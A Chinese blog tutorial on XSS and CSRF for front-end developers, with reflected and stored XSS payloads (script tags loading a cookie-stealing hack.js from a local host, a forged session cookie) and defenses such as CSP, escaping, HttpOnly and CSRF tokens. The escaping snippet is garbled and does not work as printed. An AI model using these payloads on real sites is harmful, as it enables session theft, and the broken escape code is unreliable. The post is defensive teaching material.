前端常见的Web攻击【XSS、CSRF】

已于 2024-01-13 18:22:43 修改
阅读量103 收藏
点赞数
文章标签: web安全 php 服务器 安全 csrf
于 2023-03-07 17:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57543652/article/details/129377058
版权

1、XSS(Corss Site Scripting,跨站脚本攻击)

通过存在的安全漏洞的web网址用户的浏览器内运行非法的本站点的HTML标签或者JS的一种方式。换句话来说,就是在该页面内运行不是该页面的js或者html代码的一种攻击。


XSS的脚本攻击的影响:
1、利用虚假的表单信息骗取用户个人信息
2、利利⽤用脚本窃取⽤用户的Cookie值,被害者在不不知情的情况下,帮助攻击者发送恶意请求。
3、显示伪造的图片或者文章

1、XSS攻击的分类

1、反射型:url参数直接注入


例子1:
// 普通
http://localhost:3000/?from=china
// alert尝试
http://localhost:3000/?from=<script>alert(3)</script>
// 获取Cookie
http://localhost:3000/?from=<script src="http://localhost:4000/hack.js">
</script>
// 短域名伪造 https://dwz.cn/
// 伪造cookie⼊入侵 chrome
document.cookie="kaikeba:sess=eyJ1c2VybmFtZSI6Imxhb3dhbmciLCJfZXhwaXJlIjoxNTUzNTY1MDAxODYxLCJfbWF4QWdlIjo4NjQwMDAwMH0="

2、存储型:存储到DB后读取注入


// 评论
<script>alert(1)</script>
// 跨站脚本注⼊入
我来了了<script src="http://localhost:4000/hack.js"></script>

2、XSS攻击的危害[想干啥就干啥]

  • 1、获取页面数据

  • 2、获取Cookies

  • 3、劫取前端逻辑

  • 4、发送请求

  • 5、偷取网站的资料和用户的资料

  • 6、偷取用户的秘密和登录态

  • 7、欺骗用户

3、XSS攻击如何防范

1、CSP(Content Security Policy,安全攻击策略) 是一个附加的安全层。本质上就是建立白名单,开发者明确的告诉浏览器哪些外部资源可以加载和执行。开发者只需要配置规则,如何拦截就靠浏览器执行,可以通过这种方式减少XSS攻击。

  • ①Content-Security-Policy: default-src 'self':只允许加载本站资源* ②Content-Security-Policy: img-src https://* :只允许加载HTTPS协议图片* ③Content-Security-Policy: child-src 'none' :不允许加载任何来源框架 用法:在head中加入meta标签,<meta http-equiv="Content-Security-Policy" content="script-src 'self'"/>> 2、转义

  • 1、 黑名单:用户的输入有千千万万,可以对尖括号、斜杠、引号进行转义。str = str.replace(/&/g, '&')str = str.replace(/</g, '<')str = str.replace(/>/g, '>')str = str.replace(/"/g, '&quto;')str = str.replace(/'/g, '&#39;')str = str.replace(/`/g, '&#96;')str = str.replace(/\//g, '&#x2F;') 但是这里有一个问题,如果提交的是一个富文本的情况下,就不能用转义方法。虽然说可以采用上述黑名单的方式进行过滤,但是如果过滤的标签和属性太多的情况下,推荐使用白名单的方式。* 2、白名单:一般情况下会引入xss库const xss = require('xss')let html = xss('<h1 id="title">XSS Demo</h1><script>alert("xss");</script>')console.log(html) //<h1>XSS Demo</h1><script>alert("xss");</script> 3、HttpOnly Cookie 这种方法是预防XSS攻击获取Cookie的最佳解决办法,Web程序在设置Cookie的时候,将其属性设置为HttpOnly就可以避免该⽹网⻚页的cookie被客户端恶意JavaScript窃取,保护⽤用户cookie信息。

2、CSRF(Cross Site Request Forgery,跨站请求伪造)

是一种常⻅见的Web攻击,它利利⽤用⽤用户已登录的身份,在⽤用户毫不不知情的情况下,以⽤用户的名义完成⾮非法操作。 这个攻击的前提是用户必须在攻击网站有登录数据。

1、如何避免CSRF攻击

  • 1、使用token:每次登录都需要上传token。* 2、隐藏令牌:类似cookie,但是可以隐藏在请求头中* 3、referer验证:判断页面来源,如果是安全的则执行,不安全则不执行

方班网络安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Web 应用程序攻击:它是什么以及如何防御它?
简介
06-24 1953
在过去几年中,Web 应用程序攻击是一种日益严重的网络安全威胁。在2022 年全球网络攻击增加38%,估计 46%的网站 在应用程序级别存在安全漏洞。因此,您的网站很可能容易受到这种类型的攻击,这就是为什么您必须了解 Web 应用程序攻击以及您可以采取哪些措施来防止它发生。在这里,我们将了解您需要了解的有关 Web 应用程序攻击以及如何防御它的所有信息。然而,让我们首先讨论 Web 应用程序攻击的基本概念。提示:以下是本篇文章正文内容,下面案例可供参考。
常见Web攻击方式有哪些?黑客:28种总有一款适合你
Karka_的博客
01-06 892
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
xss攻击csrf攻击
weixin_小白鼠的博客
09-05 338
跨站请求伪造 (Cross-site request forgery),攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。
web安全攻击与防范
zhu2003cong01的博客
05-29 575
未来,Web安全将面临更多的挑战,包括人工智能和物联网等新技术的兴起。当前,Web安全威胁的变化和复杂性加剧了Web应用程序的风险,针对这些风险,开发人员和运维人员需要时刻关注Web应用程序的安全性,并采取相应的防范措施,以确保Web应用程序在安全的环境中运行。SQL注入攻击之所以能够成功,是因为Web应用程序没有对用户的输入进行充分的过滤和验证,攻击者通过在应用程序的输入字段中输入恶意SQL代码,向数据库发送一些不当的SQL查询语句,从而能够突破数据库的安全措施,获取大量敏感信息或者控制系统的操作权。
csrfxss 的网络攻击及防范?
超级罗伯特的博客
04-18 115
击,比如获取 cookie,或者其他用户身份信息,可以分为存储型和反射型,存储型是。CSRF 就产生了,比如这个制造攻击的网站使用一张图片,但是这种图片的链接却是可。CSRF:跨站请求伪造,可以理解为攻击者盗用了用户的身份,以用户的名义发送了恶。XSS:跨站脚本攻击,是说攻击者通过注入恶意的脚本,在用户浏览网页的时候进行攻。造攻击的网站,这个网站要求访问刚刚登陆的网站,并发送了一个恶意请求,这时候。以修改数据库的,这时候攻击者就可以以用户的名义操作这个数据库,防御方式的。
TokenBasedUnsafe:一个展示XSSCSRF攻击的网站
05-14
使用JSON Web令牌(JWT)的基于令牌的用户身份验证。 使用RSA算法对JWT中的数据进行加密和解密。 后端是使用nodejs和expressjs构建的。 前端是使用带有React钩子的... Webiste演示了XSSCSRF攻击是如何发生的。
网络安全原理与应用:跨站请求伪造CSRF简介.pptx
05-16
XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。 跨站请求伪造CSRF简介 一、跨站请求伪造CSRF简介 攻击原理 跨站请求伪造CSRF简介 一、跨站请求...
前端性能优化与Web安全
08-26
从前各UI、资源压缩、服务端、缓存、应用渲染等方面介绍前端性能优化,以及Web安全,如:XSSCSRF、SQL注入、http劫持、数据验证等。
Web前端黑客技术解密
10-30
主要包含Web前端安全的跨站脚本(XSS)、跨站请求伪造(CSRF)、界面操作劫持这三大类,涉及的知识点涵盖信任与信任关系、Cookie安全、Flash安全、DOM渲染、字符集、跨域、原生态攻击、高级钓鱼、蠕虫思想等,这些都...
csrfxss攻击
weixin_50975172的博客
06-08 69
csrfxss攻击
XSS攻击CSRF攻击
weixin_47198976的博客
08-28 360
XSS攻击CSRF攻击
XSS攻击CSRF攻击(浅显易懂)
laya1211的博客
09-15 392
1、XSS攻击(跨站脚本攻击)即往web页面(包含HTML和js文件)嵌入可执行的代码(js) 2、CSRF(跨站点请求伪造)攻击者伪造一个请求,诱使用户去触发这个请求,以此冒充用户身份向服务器发送伪造请求,并且该伪造请求被服务器成功执行。
web常见攻击方式
热门推荐
weixin_50736511的博客
04-18 1万+
xss攻击 用户通过浏览器访问web网页,xss攻击通过各种办法在用户访问页面的时候,插入一些自己的代码或者脚本,让用户访问页面的时候,就可以执行这个脚本,攻击者通过插入的脚本的执行就会获得一些信息(比如cookie),发送到攻击者自己的网站,这就是跨站 xss的危害 1.挂马 把一个木马程序插入一个网站中,利用木马生成器生成一个网码,在传到服务器上,加上一写代码就可以让这个木马程序在打开网页的时候运行, 2.盗取用户的cookie 3.DDOS(拒绝服务)客户端浏览器 4.钓鱼攻击 5.删除目标文章,恶意
常见web攻击总结
ltycsdn007的博客
09-05 1289
Web开发离不开安全这个话题,确保网站或者网页应用的安全性,是每个开发人员都应该了解的事。本篇主要简单介绍在Web领域几种常见攻击手段及Java Web中的预防方式。 XSS SQL注入 DDOS CSRF 1. XSS 什么是XSS XSS攻击:跨站脚本攻击(Cross-Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆...
web服务器攻击的八种方式
2301_76161259的博客
03-29 2908
随着互联网的高速发展,网络走进了千家万户,同时也有很大一部分人架设起了自己的网站。继而不安分的黑客们,又将目光对准了服务器攻击这个方式,从而破坏或取得服务器的管理权限。本文将主要讲述针对web服务器攻击的八种方式。这种是ASP+ACCESS的网站入侵方式,通过注入点列出数据库里面管理员的帐号和密码信息,然后猜解出网站的后台地址,然后用帐号和密码登录进去找到文件上传的地方,把ASP木马上传上去,获得一个网站的WEBSHELL,从而达到服务器攻击的目的。
Web常见攻击方式
javagty6778的博客
03-03 991
在上段代码中,我们可以看到攻击者在它的页面上构建了一个隐藏的表单,该表单内容就是一个某网站的转账接口,当用户打开该站点之后,这个表单就会被自动执行提交;攻击者诱导受害者进入第三方网站,在第三方网站中,向被攻击的网站发送跨站请求。4.当小明看到广告,点开链接,这时,恶意代码就存在在了小明的浏览器上,由于小明的淘宝处于登录状态,所以恶意代码可以获取小明的Cookie,故也能。诱骗用户点击URL带攻击代码的链接,服务器解析后响应,在返回的响应内容中隐藏和嵌入攻击者的XSS代码,被浏览器执行,从而攻击用户。
常见前端攻击及解决方式有哪些?----简洁易懂】
weixin_42936434的博客
01-31 868
你所了解的前端攻击手段有哪些,该如何预防?
7 种常见前端安全攻击
最新发布
2201_75362610的博客
01-27 974
最近发生的诸如Balancer 协议泄露之类的事件暴露了攻击者在利用前端漏洞时可以造成多大的损害。据公开承认的消息,Balancer Protocol 据报道遭到前端攻击,造成超过 24 万美元的损失。由于黑客工具和脚本的激增,发起攻击的障碍不断下降,对 Web 应用程序的威胁持续增长。这些迫使受害者在他们登录的应用程序中执行不需要的操作。例如,攻击者可以通过伪装的链接欺骗用户,使用用户存储的凭据悄悄地从用户的帐户中转移资金。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
前端面试题说一下csrf
12-07
CSRF(Cross-site request forgery),中文名为跨站请求伪造,是一种常见Web攻击方式。攻击者通过伪造用户请求,盗取用户信息或者执行非法操作。攻击者通常会通过诱导用户点击链接或者访问恶意网站的方式进行攻击攻击者通常会在恶意网站中嵌入一个图片或者iframe标签,这个标签会向目标网站发送请求,从而实现攻击。为了防止CSRF攻击,我们可以采取以下措施: 1. 验证码:在关键操作(如转账、修改密码等)前,要求用户输入验证码,从而防止攻击者通过程序自动提交请求。 2. Referer检查:在服务器端对请求的Referer进行检查,如果Referer不是本站点,则拒绝请求。 3. Token验证:在每个表单中添加一个随机生成的Token,服务器端在接收到请求时验证Token的有效性,从而防止攻击者伪造请求。 4. SameSite Cookie:设置Cookie的SameSite属性为Strict或者Lax,从而防止跨站请求伪造攻击。 5. 防止XSS攻击XSS攻击可以劫持用户的会话,从而实现CSRF攻击。因此,我们需要采取措施防止XSS攻击,如对用户输入进行过滤和转义。 6. HTTPS:使用HTTPS协议可以防止中间人攻击,从而保证请求的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

方班网络安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值